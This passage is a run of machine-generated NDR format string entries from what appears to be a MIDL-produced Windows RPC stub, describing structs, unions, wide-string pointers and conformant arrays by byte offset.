/* 4938 */	NdrFcShort( 0x10 ),	/* Offset= 16 (4954) */
/* 4940 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 4942 */	0x36,		/* FC_POINTER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 4944 */	0x0,		/* 0 */
			NdrFcShort( 0xecbb ),	/* Offset= -4933 (12) */
			0x8,		/* FC_LONG */
/* 4948 */	0x40,		/* FC_STRUCTPAD4 */
			0x36,		/* FC_POINTER */
/* 4950 */	0x36,		/* FC_POINTER */
			0x8,		/* FC_LONG */
/* 4952 */	0x40,		/* FC_STRUCTPAD4 */
			0x5b,		/* FC_END */
/* 4954 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 4956 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 4958 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 4960 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 4962 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 4964 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 4966 */
			0x11, 0x4,	/* FC_RP [alloced_on_stack] */
/* 4968 */	NdrFcShort( 0x2 ),	/* Offset= 2 (4970) */
/* 4970 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 4972 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x54,		/* FC_DEREFERENCE */
/* 4974 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 4976 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 4978 */	0x0 ,
			0x0,		/* 0 */
/* 4980 */	NdrFcLong( 0x0 ),	/* 0 */
/* 4984 */	NdrFcLong( 0x0 ),	/* 0 */
/* 4988 */	NdrFcShort( 0x2 ),	/* Offset= 2 (4990) */
/* 4990 */	NdrFcShort( 0x8 ),	/* 8 */
/* 4992 */	NdrFcShort( 0xf ),	/* 15 */
/* 4994 */	NdrFcLong( 0x0 ),	/* 0 */
/* 4998 */	NdrFcShort( 0x58 ),	/* Offset= 88 (5086) */
/* 5000 */	NdrFcLong( 0x1 ),	/* 1 */
/* 5004 */	NdrFcShort( 0xc8 ),	/* Offset= 200 (5204) */
/* 5006 */	NdrFcLong( 0x2 ),	/* 2 */
/* 5010 */	NdrFcShort( 0xea ),	/* Offset= 234 (5244) */
/* 5012 */	NdrFcLong( 0x3 ),	/* 3 */
/* 5016 */	NdrFcShort( 0x138 ),	/* Offset= 312 (5328) */
/* 5018 */	NdrFcLong( 0x4 ),	/* 4 */
/* 5022 */	NdrFcShort( 0x132 ),	/* Offset= 306 (5328) */
/* 5024 */	NdrFcLong( 0x5 ),	/* 5 */
/* 5028 */	NdrFcShort( 0x17e ),	/* Offset= 382 (5410) */
/* 5030 */	NdrFcLong( 0x6 ),	/* 6 */
/* 5034 */	NdrFcShort( 0x1de ),	/* Offset= 478 (5512) */
/* 5036 */	NdrFcLong( 0x7 ),	/* 7 */
/* 5040 */	NdrFcShort( 0x256 ),	/* Offset= 598 (5638) */
/* 5042 */	NdrFcLong( 0x8 ),	/* 8 */
/* 5046 */	NdrFcShort( 0x286 ),	/* Offset= 646 (5692) */
/* 5048 */	NdrFcLong( 0x9 ),	/* 9 */
/* 5052 */	NdrFcShort( 0x2d2 ),	/* Offset= 722 (5774) */
/* 5054 */	NdrFcLong( 0xa ),	/* 10 */
/* 5058 */	NdrFcShort( 0x326 ),	/* Offset= 806 (5864) */
/* 5060 */	NdrFcLong( 0xfffffffa ),	/* -6 */
/* 5064 */	NdrFcShort( 0x38e ),	/* Offset= 910 (5974) */
/* 5066 */	NdrFcLong( 0xfffffffb ),	/* -5 */
/* 5070 */	NdrFcShort( 0x3da ),	/* Offset= 986 (6056) */
/* 5072 */	NdrFcLong( 0xfffffffc ),	/* -4 */
/* 5076 */	NdrFcShort( 0x3d8 ),	/* Offset= 984 (6060) */
/* 5078 */	NdrFcLong( 0xfffffffe ),	/* -2 */
/* 5082 */	NdrFcShort( 0x4 ),	/* Offset= 4 (5086) */
/* 5084 */	NdrFcShort( 0xffff ),	/* Offset= -1 (5083) */
/* 5086 */
			0x12, 0x0,	/* FC_UP */
/* 5088 */	NdrFcShort( 0x68 ),	/* Offset= 104 (5192) */
/* 5090 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x7,		/* 7 */
/* 5092 */	NdrFcShort( 0x90 ),	/* 144 */
/* 5094 */	NdrFcShort( 0x0 ),	/* 0 */
/* 5096 */	NdrFcShort( 0x26 ),	/* Offset= 38 (5134) */
/* 5098 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 5100 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 5102 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 5104 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 5106 */	NdrFcShort( 0xec1a ),	/* Offset= -5094 (12) */
/* 5108 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 5110 */	NdrFcShort( 0xec16 ),	/* Offset= -5098 (12) */
/* 5112 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 5114 */	NdrFcShort( 0xec12 ),	/* Offset= -5102 (12) */
/* 5116 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 5118 */	NdrFcShort( 0xec0e ),	/* Offset= -5106 (12) */
/* 5120 */	0xb,		/* FC_HYPER */
			0xb,		/* FC_HYPER */
/* 5122 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 5124 */	NdrFcShort( 0xfefa ),	/* Offset= -262 (4862) */
/* 5126 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 5128 */	NdrFcShort( 0xfef6 ),	/* Offset= -266 (4862) */
/* 5130 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 5132 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 5134 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 5136 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 5138 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 5140 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 5142 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 5144 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 5146 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 5148 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 5150 */
			0x21,		/* FC_BOGUS_ARRAY */
			0x7,		/* 7 */
/* 5152 */	NdrFcShort( 0x0 ),	/* 0 */
/* 5154 */	0x9,		/* Corr desc: FC_ULONG */
			0x0,		/*  */
/* 5156 */	NdrFcShort( 0xfff8 ),	/* -8 */
/* 5158 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 5160 */	0x0 ,
			0x0,		/* 0 */
/* 5162 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5166 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5170 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 5174 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
/* 5176 */	0x0 ,
			0x0,		/* 0 */
/* 5178 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5182 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5186 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 5188 */	NdrFcShort( 0xff9e ),	/* Offset= -98 (5090) */
/* 5190 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 5192 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x7,		/* 7 */
/* 5194 */	NdrFcShort( 0x8 ),	/* 8 */
/* 5196 */	NdrFcShort( 0xffd2 ),	/* Offset= -46 (5150) */
/* 5198 */	NdrFcShort( 0x0 ),	/* Offset= 0 (5198) */
/* 5200 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 5202 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 5204 */
			0x12, 0x0,	/* FC_UP */
/* 5206 */	NdrFcShort( 0x1c ),	/* Offset= 28 (5234) */
/* 5208 */
			0x1b,		/* FC_CARRAY */
			0x7,		/* 7 */
/* 5210 */	NdrFcShort( 0x18 ),	/* 24 */
/* 5212 */	0x9,		/* Corr desc: FC_ULONG */
			0x0,		/*  */
/* 5214 */	NdrFcShort( 0xfff8 ),	/* -8 */
/* 5216 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 5218 */	0x0 ,
			0x0,		/* 0 */
/* 5220 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5224 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5228 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 5230 */	NdrFcShort( 0xed5c ),	/* Offset= -4772 (458) */
/* 5232 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 5234 */
			0x17,		/* FC_CSTRUCT */
			0x7,		/* 7 */
/* 5236 */	NdrFcShort( 0x8 ),	/* 8 */
/* 5238 */	NdrFcShort( 0xffe2 ),	/* Offset= -30 (5208) */
/* 5240 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 5242 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 5244 */
			0x12, 0x0,	/* FC_UP */
/* 5246 */	NdrFcShort( 0x46 ),	/* Offset= 70 (5316) */
/* 5248 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x7,		/* 7 */
/* 5250 */	NdrFcShort( 0x38 ),	/* 56 */
/* 5252 */	NdrFcShort( 0x0 ),	/* 0 */
/* 5254 */	NdrFcShort( 0x10 ),	/* Offset= 16 (5270) */
/* 5256 */	0x36,		/* FC_POINTER */
			0x8,		/* FC_LONG */
/* 5258 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 5260 */	NdrFcShort( 0xfe72 ),	/* Offset= -398 (4862) */
/* 5262 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 5264 */	NdrFcShort( 0xeb7c ),	/* Offset= -5252 (12) */
/* 5266 */	0x40,		/* FC_STRUCTPAD4 */
			0xb,		/* FC_HYPER */
/* 5268 */	0xb,		/* FC_HYPER */
			0x5b,		/* FC_END */
/* 5270 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 5272 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 5274 */
			0x21,		/* FC_BOGUS_ARRAY */
			0x7,		/* 7 */
/* 5276 */	NdrFcShort( 0x0 ),	/* 0 */
/* 5278 */	0x9,		/* Corr desc: FC_ULONG */
			0x0,		/*  */
/* 5280 */	NdrFcShort( 0xfff8 ),	/* -8 */
/* 5282 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 5284 */	0x0 ,
			0x0,		/* 0 */
/* 5286 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5290 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5294 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 5298 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
/* 5300 */	0x0 ,
			0x0,		/* 0 */
/* 5302 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5306 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5310 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 5312 */	NdrFcShort( 0xffc0 ),	/* Offset= -64 (5248) */
/* 5314 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 5316 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x7,		/* 7 */
/* 5318 */	NdrFcShort( 0x8 ),	/* 8 */
/* 5320 */	NdrFcShort( 0xffd2 ),	/* Offset= -46 (5274) */
/* 5322 */	NdrFcShort( 0x0 ),	/* Offset= 0 (5322) */
/* 5324 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 5326 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 5328 */
			0x12, 0x0,	/* FC_UP */
/* 5330 */	NdrFcShort( 0x44 ),	/* Offset= 68 (5398) */
/* 5332 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 5334 */	NdrFcShort( 0x28 ),	/* 40 */
/* 5336 */	NdrFcShort( 0x0 ),	/* 0 */
/* 5338 */	NdrFcShort( 0xe ),	/* Offset= 14 (5352) */
/* 5340 */	0x36,		/* FC_POINTER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 5342 */	0x0,		/* 0 */
			NdrFcShort( 0xeb2d ),	/* Offset= -5331 (12) */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 5346 */	0x0,		/* 0 */
			NdrFcShort( 0xfe1b ),	/* Offset= -485 (4862) */
			0x8,		/* FC_LONG */
/* 5350 */	0x8,		/* FC_LONG */
			0x5b,		/* FC_END */
/* 5352 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 5354 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 5356 */
			0x21,		/* FC_BOGUS_ARRAY */
			0x3,		/* 3 */
/* 5358 */	NdrFcShort( 0x0 ),	/* 0 */
/* 5360 */	0x9,		/* Corr desc: FC_ULONG */
			0x0,		/*  */
/* 5362 */	NdrFcShort( 0xfff8 ),	/* -8 */
/* 5364 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 5366 */	0x0 ,
			0x0,		/* 0 */
/* 5368 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5372 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5376 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 5380 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
/* 5382 */	0x0 ,
			0x0,		/* 0 */
/* 5384 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5388 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5392 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 5394 */	NdrFcShort( 0xffc2 ),	/* Offset= -62 (5332) */
/* 5396 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 5398 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 5400 */	NdrFcShort( 0x8 ),	/* 8 */
/* 5402 */	NdrFcShort( 0xffd2 ),	/* Offset= -46 (5356) */
/* 5404 */	NdrFcShort( 0x0 ),	/* Offset= 0 (5404) */
/* 5406 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 5408 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 5410 */
			0x12, 0x0,	/* FC_UP */
/* 5412 */	NdrFcShort( 0x54 ),	/* Offset= 84 (5496) */
/* 5414 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 5416 */	NdrFcShort( 0x50 ),	/* 80 */
/* 5418 */	NdrFcShort( 0x0 ),	/* 0 */
/* 5420 */	NdrFcShort( 0x16 ),	/* Offset= 22 (5442) */
/* 5422 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 5424 */	NdrFcShort( 0xfdce ),	/* Offset= -562 (4862) */
/* 5426 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 5428 */	0xd,		/* FC_ENUM16 */
			0x8,		/* FC_LONG */
/* 5430 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 5432 */	0x36,		/* FC_POINTER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 5434 */	0x0,		/* 0 */
			NdrFcShort( 0xead1 ),	/* Offset= -5423 (12) */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 5438 */	0x0,		/* 0 */
			NdrFcShort( 0xeacd ),	/* Offset= -5427 (12) */
			0x5b,		/* FC_END */
/* 5442 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 5444 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 5446 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 5448 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 5450 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 5452 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 5454 */
			0x21,		/* FC_BOGUS_ARRAY */
			0x3,		/* 3 */
/* 5456 */	NdrFcShort( 0x0 ),	/* 0 */
/* 5458 */	0x9,		/* Corr desc: FC_ULONG */
			0x0,		/*  */
/* 5460 */	NdrFcShort( 0xfff8 ),	/* -8 */
/* 5462 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 5464 */	0x0 ,
			0x0,		/* 0 */
/* 5466 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5470 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5474 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 5478 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
/* 5480 */	0x0 ,
			0x0,		/* 0 */
/* 5482 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5486 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5490 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 5492 */	NdrFcShort( 0xffb2 ),	/* Offset= -78 (5414) */
/* 5494 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 5496 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 5498 */	NdrFcShort( 0x10 ),	/* 16 */
/* 5500 */	NdrFcShort( 0xffd2 ),	/* Offset= -46 (5454) */
/* 5502 */	NdrFcShort( 0x0 ),	/* Offset= 0 (5502) */
/* 5504 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 5506 */	NdrFcShort( 0xfd7c ),	/* Offset= -644 (4862) */
/* 5508 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 5510 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 5512 */
			0x12, 0x0,	/* FC_UP */
/* 5514 */	NdrFcShort( 0x70 ),	/* Offset= 112 (5626) */
/* 5516 */
			0x1b,		/* FC_CARRAY */
			0x0,		/* 0 */
/* 5518 */	NdrFcShort( 0x1 ),	/* 1 */
/* 5520 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 5522 */	NdrFcShort( 0x10 ),	/* 16 */
/* 5524 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 5526 */	0x0 ,
			0x0,		/* 0 */
/* 5528 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5532 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5536 */	0x2,		/* FC_CHAR */
			0x5b,		/* FC_END */
/* 5538 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x7,		/* 7 */
/* 5540 */	NdrFcShort( 0x60 ),	/* 96 */
/* 5542 */	NdrFcShort( 0x0 ),	/* 0 */
/* 5544 */	NdrFcShort( 0x1c ),	/* Offset= 28 (5572) */
/* 5546 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 5548 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 5550 */	0x36,		/* FC_POINTER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 5552 */	0x0,		/* 0 */
			NdrFcShort( 0xfd4d ),	/* Offset= -691 (4862) */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 5556 */	0x0,		/* 0 */
			NdrFcShort( 0xfd49 ),	/* Offset= -695 (4862) */
			0x8,		/* FC_LONG */
/* 5560 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 5562 */	NdrFcShort( 0xfd44 ),	/* Offset= -700 (4862) */
/* 5564 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 5566 */	NdrFcShort( 0xea4e ),	/* Offset= -5554 (12) */
/* 5568 */	0x40,		/* FC_STRUCTPAD4 */
			0xb,		/* FC_HYPER */
/* 5570 */	0xb,		/* FC_HYPER */
			0x5b,		/* FC_END */
/* 5572 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 5574 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 5576 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 5578 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 5580 */
			0x14, 0x20,	/* FC_FP [maybenull_sizeis] */
/* 5582 */	NdrFcShort( 0xffbe ),	/* Offset= -66 (5516) */
/* 5584 */
			0x21,		/* FC_BOGUS_ARRAY */
			0x7,		/* 7 */
/* 5586 */	NdrFcShort( 0x0 ),	/* 0 */
/* 5588 */	0x9,		/* Corr desc: FC_ULONG */
			0x0,		/*  */
/* 5590 */	NdrFcShort( 0xfff8 ),	/* -8 */
/* 5592 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 5594 */	0x0 ,
			0x0,		/* 0 */
/* 5596 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5600 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5604 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 5608 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
/* 5610 */	0x0 ,
			0x0,		/* 0 */
/* 5612 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5616 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5620 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 5622 */	NdrFcShort( 0xffac ),	/* Offset= -84 (5538) */
/* 5624 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 5626 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x7,		/* 7 */
/* 5628 */	NdrFcShort( 0x8 ),	/* 8 */
/* 5630 */	NdrFcShort( 0xffd2 ),	/* Offset= -46 (5584) */
/* 5632 */	NdrFcShort( 0x0 ),	/* Offset= 0 (5632) */
/* 5634 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 5636 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 5638 */
			0x12, 0x0,	/* FC_UP */
/* 5640 */	NdrFcShort( 0x2a ),	/* Offset= 42 (5682) */
/* 5642 */
			0x15,		/* FC_STRUCT */
			0x7,		/* 7 */
/* 5644 */	NdrFcShort( 0x20 ),	/* 32 */
/* 5646 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 5648 */	NdrFcShort( 0xe9fc ),	/* Offset= -5636 (12) */
/* 5650 */	0xb,		/* FC_HYPER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 5652 */	0x0,		/* 0 */
			NdrFcShort( 0xfce9 ),	/* Offset= -791 (4862) */
			0x5b,		/* FC_END */
/* 5656 */
			0x1b,		/* FC_CARRAY */
			0x7,		/* 7 */
/* 5658 */	NdrFcShort( 0x20 ),	/* 32 */
/* 5660 */	0x9,		/* Corr desc: FC_ULONG */
			0x0,		/*  */
/* 5662 */	NdrFcShort( 0xfff8 ),	/* -8 */
/* 5664 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 5666 */	0x0 ,
			0x0,		/* 0 */
/* 5668 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5672 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5676 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 5678 */	NdrFcShort( 0xffdc ),	/* Offset= -36 (5642) */
/* 5680 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 5682 */
			0x17,		/* FC_CSTRUCT */
			0x7,		/* 7 */
/* 5684 */	NdrFcShort( 0x8 ),	/* 8 */
/* 5686 */	NdrFcShort( 0xffe2 ),	/* Offset= -30 (5656) */
/* 5688 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 5690 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 5692 */
			0x12, 0x0,	/* FC_UP */
/* 5694 */	NdrFcShort( 0x44 ),	/* Offset= 68 (5762) */
/* 5696 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x7,		/* 7 */
/* 5698 */	NdrFcShort( 0x28 ),	/* 40 */
/* 5700 */	NdrFcShort( 0x0 ),	/* 0 */
/* 5702 */	NdrFcShort( 0xe ),	/* Offset= 14 (5716) */
/* 5704 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 5706 */	NdrFcShort( 0xe9c2 ),	/* Offset= -5694 (12) */
/* 5708 */	0xb,		/* FC_HYPER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 5710 */	0x0,		/* 0 */
			NdrFcShort( 0xfcaf ),	/* Offset= -849 (4862) */
			0x36,		/* FC_POINTER */
/* 5714 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 5716 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 5718 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 5720 */
			0x21,		/* FC_BOGUS_ARRAY */
			0x7,		/* 7 */
/* 5722 */	NdrFcShort( 0x0 ),	/* 0 */
/* 5724 */	0x9,		/* Corr desc: FC_ULONG */
			0x0,		/*  */
/* 5726 */	NdrFcShort( 0xfff8 ),	/* -8 */
/* 5728 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 5730 */	0x0 ,
			0x0,		/* 0 */
/* 5732 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5736 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5740 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 5744 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
/* 5746 */	0x0 ,
			0x0,		/* 0 */
/* 5748 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5752 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5756 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 5758 */	NdrFcShort( 0xffc2 ),	/* Offset= -62 (5696) */
/* 5760 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 5762 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x7,		/* 7 */
/* 5764 */	NdrFcShort( 0x8 ),	/* 8 */
/* 5766 */	NdrFcShort( 0xffd2 ),	/* Offset= -46 (5720) */
/* 5768 */	NdrFcShort( 0x0 ),	/* Offset= 0 (5768) */
/* 5770 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 5772 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 5774 */
			0x12, 0x0,	/* FC_UP */
/* 5776 */	NdrFcShort( 0x4c ),	/* Offset= 76 (5852) */
/* 5778 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x7,		/* 7 */
/* 5780 */	NdrFcShort( 0x40 ),	/* 64 */
/* 5782 */	NdrFcShort( 0x0 ),	/* 0 */
/* 5784 */	NdrFcShort( 0x12 ),	/* Offset= 18 (5802) */
/* 5786 */	0x36,		/* FC_POINTER */
			0x8,		/* FC_LONG */
/* 5788 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 5790 */	NdrFcShort( 0xfc60 ),	/* Offset= -928 (4862) */
/* 5792 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 5794 */	NdrFcShort( 0xe96a ),	/* Offset= -5782 (12) */
/* 5796 */	0x40,		/* FC_STRUCTPAD4 */
			0xb,		/* FC_HYPER */
/* 5798 */	0xb,		/* FC_HYPER */
			0x36,		/* FC_POINTER */
/* 5800 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 5802 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 5804 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 5806 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 5808 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 5810 */
			0x21,		/* FC_BOGUS_ARRAY */
			0x7,		/* 7 */
/* 5812 */	NdrFcShort( 0x0 ),	/* 0 */
/* 5814 */	0x9,		/* Corr desc: FC_ULONG */
			0x0,		/*  */
/* 5816 */	NdrFcShort( 0xfff8 ),	/* -8 */
/* 5818 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 5820 */	0x0 ,
			0x0,		/* 0 */
/* 5822 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5826 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5830 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 5834 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
/* 5836 */	0x0 ,
			0x0,		/* 0 */
/* 5838 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5842 */	NdrFcLong( 0x0 ),	/* 0 */
/* 5846 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
